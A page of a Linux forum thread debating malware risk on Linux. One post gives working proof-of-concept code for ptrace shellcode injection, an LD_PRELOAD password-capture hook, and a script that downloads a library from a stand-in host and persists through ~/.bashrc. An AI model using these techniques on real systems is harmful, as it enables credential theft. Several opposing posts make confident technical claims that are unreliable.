Find the answer to your Linux question:
Page 2 of 4 FirstFirst 1 2 3 4 LastLast
Results 11 to 20 of 32
Cliff Stoll's "The Cuckoo's Egg" states a simple explanation of how to break into a system. Early versions of *NIX had lax security built in, plus ignorant administrators. Additionally, most ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #11
    Linux Newbie previso's Avatar
    Join Date
    Jan 2010
    Location
    SC
    Posts
    116

    Cliff Stoll's "The Cuckoo's Egg" states a simple explanation of how to break into a system. Early versions of *NIX had lax security built in, plus ignorant administrators. Additionally, most Linux users are so by choice, rather than by default, as with Window$. Most M$ viruses and Trojans are introduced by the user's ignorance, through E-mail attatchments, malicious scripts in Web pages, and administrator priviledges granted to the user during installation.
    The typical Linux user soon realizes nothing will install without the admin password. AND, there's no Internet Explorer in Linux, Microsoft's ultimate hubris in making the browser's vulnerabilities the hacker's entry point of choice in priviledge escalation.

  2. #12
    khf
    khf is offline
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslom Brussels
    Posts
    30
    Quote Originally Posted by wisehacks View Post
    Malware in Linux is just a matter of:

    a) Number of people using it
    b) Finding a suitable infection vector

    As you probably know, trojans and other malware in Windows, do not exploit vulnerabilities to infect or to steal data from the user. Moreover, most malware is running in user mode. API Hooking in userland is as simple in Linux as it's in Windows (I've written some apps), so it is memory injection and binary infection. What makes the difference? Mainly, windows malware first infects trough binded executables (to a picture, a video or anything else). The user downloads that funny pics, or that fancy app, and when they execute it, the trojan is delivered too. In Linux, people used to install from repositories, so rogue binaries are less frequent. Furthermore, a binded jpg+binary would not have the same effect in Linux, cos it won't be executable when downloaded (nothing is +x by default), and double click on the picture is gonna open the pic, not exec the trojan.

    The key point is that it might not be very profitable and that theres no known easy-for-all spread mechanism.
    This is the kind of nonsense that should be avoided, and i would like to see those applications you have written. Malware usually exploits vulnerabilities.
    Microsoft made an operating system that was incomplete. They also paid no attention to security issues - a simple example is that the "kernel debugger" is the most frequently used command processor - or "executing shell". The rumour was that they planned to exploit the holes by offering "consulting services" that were able to enter through those holes and "repair", but hackers discovered this long before MS could make business out of it. It is just as easy to link up a library in run time as in Windows - the difference is that while Windows has no mechanisms to stop another application for modifying these libraries, Linux has.

    You can modify in your own address space, but keep your fingers off other's address space. And in particular, usage of the symbolic debugger to debug and expose the kernel is very protected - while in Windows it is wide open and well documented - NTVDM.EXE. "Everyone" use this to run scripts....

    In Linux as in Unix, a picture is a picture and cannot be executed. So that it can be executed in Windows is a pretty good example of how bad things you have gradually grown to accept.

  3. #13
    Just Joined!
    Join Date
    Apr 2010
    Posts
    7
    Quote Originally Posted by khf View Post
    This is the kind of nonsense that should be avoided, and i would like to see those applications you have written. Malware usually exploits vulnerabilities.
    Wrong. Worms exploit vulnerabilities to spread. Malware is a general category, and include, for example, trojan horses [worms are malware as well]. We can find a thousand trojans for Windows that don't exploit vulnerabilities. They just come in a keygen (or wherever), silently deploys in your system and, for example steals your private information (passwords, documents, whatever). That kind of software, is as easy to code in Windows as it's in Linux. If you trick the user into executing a rogue program, nothing stops you from hooking processes running with the same user id (say firefox, pidgin, etc). Getting your trojan executed in every reboot is as easy as saving it into ~/.kde/autostart (there are more complicated ways, but this is a simple one). Moreover, playing around with the environment variables you can force a user executing your apps instead of the system default, being able to hook them totally (except setuid ones). Just stay there till you catch de password and then deploy as rootkit.

    Quote Originally Posted by khf View Post
    It is just as easy to link up a library in run time as in Windows - the difference is that while Windows has no mechanisms to stop another application for modifying these libraries, Linux has.
    I'm not sure what you're talking about here. Not being rude, just don't get it.

    Quote Originally Posted by khf View Post
    You can modify in your own address space, but keep your fingers off other's address space.
    All you need is to modify the address space of every process that is running as your user. Thats all a banking trojan needs, for example.

    Quote Originally Posted by khf View Post
    In Linux as in Unix, a picture is a picture and cannot be executed. So that it can be executed in Windows is a pretty good example of how bad things you have gradually grown to accept.
    Agree, there's a misconception in the uses of applications/file formats derived from how Windows implemented them in the first place.

  4. $spacer_open
    $spacer_close
  5. #14
    Linux User martinfromdublin's Avatar
    Join Date
    Dec 2004
    Location
    Dublin, Rep. of Ireland
    Posts
    448
    There are many Linux distros such as SuSe & Mandriva that come with a firewall built in, SuSe's is switched on by default during installation. You should also use some form of NAT device between your machine(s) and broadband router. Also, be careful when extracting RAR files downloaded, I had one that proceeded to erase the contents of the external USB hard-drive it was downloaded to and the only way I could stop it was to pull out the USB plug - and that was under LinuxMint.

    The moral of the story is that your Linux system is unlikely to become a target for viruses/malware but you should still not be complacent.
    LINUX: Where do you want to go.......Tomorrow!

    Registered Linux user 396633

  6. #15
    khf
    khf is offline
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslom Brussels
    Posts
    30
    Quote Originally Posted by wisehacks View Post
    Wrong. Worms exploit vulnerabilities to spread. Malware is a general category, and include, for example, trojan horses [worms are malware as well]. We can find a thousand trojans for Windows that don't exploit vulnerabilities. They just come in a keygen (or wherever), silently deploys in your system and, for example steals your private information (passwords, documents, whatever). That kind of software, is as easy to code in Windows as it's in Linux. If you trick the user into executing a rogue program, nothing stops you from hooking processes running with the same user id (say firefox, pidgin, etc). Getting your trojan executed in every reboot is as easy as saving it into ~/.kde/autostart (there are more complicated ways, but this is a simple one). Moreover, playing around with the environment variables you can force a user executing your apps instead of the system default, being able to hook them totally (except setuid ones). Just stay there till you catch de password and then deploy as rootkit.


    I'm not sure what you're talking about here. Not being rude, just don't get it.


    All you need is to modify the address space of every process that is running as your user. Thats all a banking trojan needs, for example.


    Agree, there's a misconception in the uses of applications/file formats derived from how Windows implemented them in the first place.
    I contest anyone to show how to catch passwords and keystrokes on Linux - from a browser applet.
    This remark is typical for those that believe a lot and has never ever done anything. "All you need is to modify the address space" - maybe on Windows, but before posting: HAVE YOU TRIED THAT ON LINUX?

    No, you just don't get it. The "banking trojan" will not work on Linux. I am sure what I talk about, and that is that you do not know anything about "trojans" or "keygens" or "security threats" and address space sharing. And big words does not impress this bloke.

  7. #16
    khf
    khf is offline
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslom Brussels
    Posts
    30
    Quote Originally Posted by Martin from Dublin View Post
    There are many Linux distros such as SuSe & Mandriva that come with a firewall built in, SuSe's is...

    The moral of the story is that your Linux system is unlikely to become a target for viruses/malware but you should still not be complacent.
    Amen!

    Ubuntu also comes with a decent firewall and a network monitor that shows you the open connections. The same is not provided in Xubuntu - needs to be downloaded. However, Kubuntu comes with the firewall and the network monitor.

    The first viruses came on Unix and the best programmers / hackers use Linux now.

  8. #17
    Linux Newbie previso's Avatar
    Join Date
    Jan 2010
    Location
    SC
    Posts
    116
    Before we escalate into further personal accusations, our newbie was curious on the security features of Linux. I believe we can all agree that *NIX is less prone to virus attack than M$. Also, we concur that we must maintain vigilance over the system's security. And, most bad junk is written for M$ because more people use it, are less cautious with it, and has more flaws to exploit.
    "Can't we all just get along?"

  9. #18
    khf
    khf is offline
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslom Brussels
    Posts
    30
    Quote Originally Posted by previso View Post
    Before we escalate into further personal accusations, our newbie was curious on the security features of Linux. ... And, most bad junk is written for M$ because more people use it, ...and has more flaws to exploit.
    ...
    Let us be blunt and say that there are some very simple rules that is imposed in *NIX that M$ just ignored, and gives us great pain because it makes it so simple to write programs that are destructive.

    There are things you cannot do in *NIX, such as start the kernel in "sdb" and change it while it is running - as you do with Windows. This is a feature implemented in Windows and not in *NIX because who of you has the skills to muck around with the kernel? if you have, you also know how to debug it.

    However, since IPX/SPX failed to make world dominance, there is a number of features in tcp/ip - "Sockets()" that is not implemented by M$. I with a number of others believe M$ made the omission on purpose.

    When it comes to code that attempts to execute without you observing this, such as a computer virus, the tiny changes place the two miles apart. When it comes to protecting files and devices, *NIX provides protection - if your programme is not requesting the keyboard input, you cannot read it - just capture the password as the "asterix" printed.

    When it comes to making code that you allow to be executed, you have the same risks as on Windows. So, if an applet reports your surfing habit, it will also report this on Linux. You will only be notified if the applet tries to execute outside the browser and remain on your computer. A Linux firewall should detect this.

    A script that can be started will only run with "user" privileges on Linux, and cannot modify critical resources, unless you are asked, and grants it access. It is fully possible to shoot oneself in the foot and saw the branch you sit on.

    It is not possible to modify another running process or read its data. For that, you need to use an application debugger, and launch the application in this. This is to retain application integrity. However, all applications may share input/output and even memory but the latter is either by a parent/child relationship inheriting the same "static" memory, or by "attaching" the memory using a "key" that is held by the process that created the shared instance. This is a simple way of halting others from reading and modifying memory, and inhibit "sniffing" passwords and input to other applications where it is "none of your business".

    But, nothing can stop an applet to pop up and ask you to key in all your passwords, including the "root". So back to the initial question: it is possible to do silly things with Linux also, it is also possible for others to do silly things with your Linux, but compared to Windows, they are worlds apart. It is possible to be spied on in Linux, to capture your passwords and email addresses - but it is very easy to be alert and notice the racket. It is very easy to do silly things in Linux, but the ignorance of the alerts even here scare me. Since we know how to make it better, and nobody has done it, the usual reason is pragmatism - it is not worth the effort, or enough is enough. Further constraints restricts other things and makes them more difficult to achieve. So, using *NIX does not cater for turning common sense off. If they ask for your credit card number - check first who is asking, and if you are in the process of paying before you expose it.

  10. #19
    Just Joined!
    Join Date
    Apr 2010
    Posts
    7
    Quote Originally Posted by khf View Post
    It is not possible to modify another running process or read its data. For that, you need to use an application debugger, and launch the application in this. This is to retain application integrity. However, all applications may share input/output and even memory but the latter is either by a parent/child relationship inheriting the same "static" memory, or by "attaching" the memory using a "key" that is held by the process that created the shared instance. This is a simple way of halting others from reading and modifying memory, and inhibit "sniffing" passwords and input to other applications where it is "none of your business".
    It seems that you're not aware of what your talking about. You are saying you cannot modify another process running with your same user id or read its data? Really? As you say, HAVE YOU EVER TRIED? Let's give you a simple POC. Look at this sample code:
    Code:
    #include <stdio.h>
    #include <unistd.h>
    
    int main(int argc, char** argv){
     int v = 5;
    
     while (1){
     printf("Meaning of life is %d\n", v);
     sleep(1);
     }
     return 0;
    }
    Lets just exec it:
    Code:
    [wisehacks@trantor ~]$ gcc -o victim victim.c 
    [wisehacks@trantor ~]$ ./victim 
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    ^C
    Everything's fine. Now look at this snippet of code.

    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/ptrace.h>
    #include <sys/types.h>
    #include <string.h>
    #include <sys/user.h>
    #include <signal.h>
    #include <errno.h>
    
    // Machine code to inject, write() followed by exit(0)
    unsigned char code[]=
     "\x31\xc0\xb0\x04\x31\xdb\x43\xeb\x12\x31\xc9\x8b\x0c\x24\x31\xd2"
     "\xb2\x1c\xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80\xe8\xe9\xff\xff\xff"
     "\x45\x6c\x20\x73\x65\x6e\x74\x69\x64\x6f\x20\x64\x65\x20\x6c\x61"
     "\x20\x76\x69\x64\x61\x20\x65\x73\x20\x34\x32\x0a";
    
    int main(int argc, char** argv){
     pid_t pid;
     int i;
     struct user_regs_struct regs;
    
     if (argc != 2){
     printf("Usage: %s <process id>\n",argv[0]);
     exit(1);
     }
    
     pid = (pid_t)atoi(argv[1]);
    
     printf("[?] Attaching to process %d...\n",pid);
     if (ptrace(PTRACE_ATTACH, pid,0,0) < 0){
     perror("[!] ptrace: ATTACH");
     exit(1);
     }
     printf("[+] Succesfully attached!\n");
    
    // Wait to be sure the process has stopped
     wait(NULL);
    
     printf("[?] Getting register information for the process...\n");
     if (ptrace(PTRACE_GETREGS, pid, 0, &regs) < 0){
     perror("[!] ptrace: GETREGS");
     exit(1);
     }
     printf("[+] Got eip pointing at 0x%x\n", (unsigned int)regs.eip);
    
     printf("[?] Injecting code at eip...\n");
     for (i=0;i<strlen(code);i++){
     if (ptrace(PTRACE_POKEDATA, pid, regs.eip+i,*(unsigned char*)(code+i))) {
     perror("[!]ptrace: POKEDATA");
     exit(1);
     }
     }
    
     printf("[+] Code injected succesfully!\n[?] Detaching...\n");
     // should check if the proc exists,
     // if it does, it should be stopped with sigstop before dettaching
     // if its stopped by the means of another signal, make it continue and
     // then stop it. If the process is part of a thread group things are a little more
     // complicated. But, hey, this is just a POC
     if (ptrace(PTRACE_DETACH, pid, 0, SIGCONT) == -1){
     if (errno != ESRCH){
     // shouldn't happen
     perror("[!] Detach: ");
     exit(1);
    
     }
     kill(pid, SIGCONT);
     }
     printf("[+] Done!\n");
     return 0;
    }
    I attach to the process, locate where EIP is pointing at, and write there a code (in binary format) directly there. The code writes a different message on the screen and then exits. In the victim window we see:

    Code:
    [wisehacks@trantor ~]$ ./victim 
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    El sentido de la vida es 42
    (The message is in spanish, because I didn't want to change the binary code for this demo, but means the same as the english one). In the injector window we see:
    Code:
    [wisehacks@trantor~]$ gcc -o inject inject.c 
    [wisehacks@trantor ~]$ ps uax | grep -i victim
    wisehacks    6640  0.0  0.0   1496   328 pts/4    S+   09:00   0:00 ./victim
    wisehacks    6642  0.0  0.0   3916   768 pts/3    R+   09:00   0:00 grep -i victim
    [wisehacks@trantor ~]$ ./inject 6640
    [?] Attaching to process 6640...
    [+] Succesfully attached!
    [?] Getting register information for the process...
    [+] Got eip pointing at 0xf772c430
    [?] Injecting code at eip...
    [+] Code injected succesfully!
    [?] Detaching...
    [+] Done!
    It should be clear enough.

    Quote Originally Posted by khf View Post
    This remark is typical for those that believe a lot and has never ever done anything. "All you need is to modify the address space" - maybe on Windows, but before posting: HAVE YOU TRIED THAT ON LINUX?

    No, you just don't get it. The "banking trojan" will not work on Linux. I am sure what I talk about, and that is that you do not know anything about "trojans" or "keygens" or "security threats" and address space sharing. And big words does not impress this bloke.
    Well, I've tried. With the above example, I hope you see that instead of a simple POC injecting a write and exit, I would be able to load a shared object overwriting the function/library calls of the victim process (lets say gtwitter, or firefox) and catch the passwords as the user put them there. It would be the same idea as using LD_PRELOAD. A demonstration of hooking with ld_preload might not be necessary, but your arguments are so astray that I will give it anyway.

    Let's look at another victim:
    Code:
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    int send_pass(char* pass){
    	printf("Im gonna send the password %s over the network\n", pass);
    	// do stuff
    	return 0;
    }
    
    int main(int argc, char** argv){
    
    	char buffer[250];
    
    	if (argc!=2){
    		printf("Usage: %s <password>\n", argv[0]);
    		exit(1);
    	}
    	if (strlen(argv[1]) >= 250){
    		printf("Password is too long\n");
    		exit(1);
    	}
    	
    	strncpy(buffer, argv[1], 250);
    	send_pass(buffer);
    
    	return 0;
    }
    Now take a look at this "replacement" evil code:
    Code:
    #include <stdio.h>
    
    char *strncpy(char *dest, const char *src, size_t n){
    	char *ret = dest;
    	
    	printf("Your password have been owned, it was %s\n", src);
    	// do the same as strncpy so the user doesnt notice
    	do{
    		if (!n--)
    		return ret;
    	} while ((*dest++ = *src++));
    	while (n--)
    		*dest++ = 0;
    	return ret;
    }
    Compile it an run:
    Code:
    [wisehacks@trantor ~]$ gcc -Wall -fPIC -shared -o evilso.so evilso.c 
    [wisehacks@trantor ~]$ gcc -o victim2 victim2.c 
    [wisehacks@trantor ~]$ ./victim2 
    Usage: ./victim2 <password>
    [wisheacks@trantor ~]$ ./victim2 mypass
    Im gonna send the password mypass over the network
    [wisehacks@trantor~]$ LD_PRELOAD="./evilso.so" ./victim2 mypass
    Your password have been owned, it was mypass
    Im gonna send the password mypass over the network
    Voilą. Again, this is just a simple POC, it can be complicated as much as you can. You can inject into any process running with your same user id, make it load a shared object with the funcs you want to hook, and that's all. There's no magical protection mechanisms, and not "do not know anything about "trojans" or "keygens" or "security threats" and address space sharing"... Arrogance and rudeness should be avoided, as you've learnt.

    Anyway, is far more simple than this, if you trick a user into executing a binary or a script like this:
    Code:
    #!/bin/sh
    
    mkdir ~/.hidden
    cd ~/.hidden
    wget hxxp://evilguy/evilso.so
    echo "#!/bin/sh
            LD_PRELOAD=\"./evilso.so\" ls $@" >> ls
    chmod +x ls
    
    echo "PATH=~/.hidden:$PATH" >> ~/.bashrc
    From that point on, every time the user opens a shell and runs ls you can control the behaviour of that. You can put there every system binary (it wont work with setuid ones). The same can be done with other environment vars, so GNOME pick the menu entries (application launchers) from that evil folder. You can also modify desktop launchers to be preceeded by LD_PRELOAD. As you can see, you can own the system without being root, you just need a common user that wants the "latest desktop wallpaper" or that downloads that "fancy script that paints a monkey on the screen".

    Linux is safer, but it's not unbeatable.

  11. #20
    khf
    khf is offline
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslom Brussels
    Posts
    30
    oh yes - you just illustrated my point well DumbHack.

    Nobody has ever said that it is impossible to do silly things on Linux - and you just exemplified this. It is fully possible to attach in a running application sequence that is a subshell of current executing shell. Here you kill the previous application to release the output stream and print something else does not impress me much and doubtfully anyone else. We planted a similar virus many years ago that showed the picture of the CEO of the company and telling the poor sod that "I am watching what you do!" This is not a problem and how viruses work. This is not "hijacking" it is reading the exit value of an application that terminates and "do something". This is how workflow is implemented - you place code at the end, check exit status and decide on "next application" based on the status code.
    But out of curiosity: how do you intend to run this inside a browser window or as an email attachment. Kill the browser and restart it? Do not assume that people are silly.

    The final example is vastly too complex for most here, but essentially it is the loading procedure. You illustrate my point that it is fully possible to make silly applications on Linux too. But it use a loading / linking procedure. Should a script suddenly start to reload and relink Thunderbird and Firefox, I would certainly download a clean version from the Mozilla site. That we allow M$ to reload and relink IE, and we say "OK" to reboot the computer is a doubtful practice. But if anyone beside M$ suddenly asks for the same, I would press power-off, and on restart download a clean version and make a full virus scan.

    A virus works without without modifying the existing executable file. On Windows, it is fully possible to intercept the keyboard and read the input to other applications. This is a "Windows design feature" to allow automated running of scripts that can complete the fields for you.

    The way M$ has made their systems, it is fully possible to "see" the number that is printed, and modify this. It may be a convenient way to enable M$ quick fixes of software bugs, and remedy errors made by them. But nothing prevents others from abusing this "feature".

    The rest of you, study the coding example above and see what it takes to make a simple code vulnerable as on Windows.

    I hope this illustrates that security is need on Linux, and that this is a different league compared to Windows. It is fully possible, but requires extensive effort, deep insight and the cooperation of the Linux user - you.

Page 2 of 4 FirstFirst 1 2 3 4 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •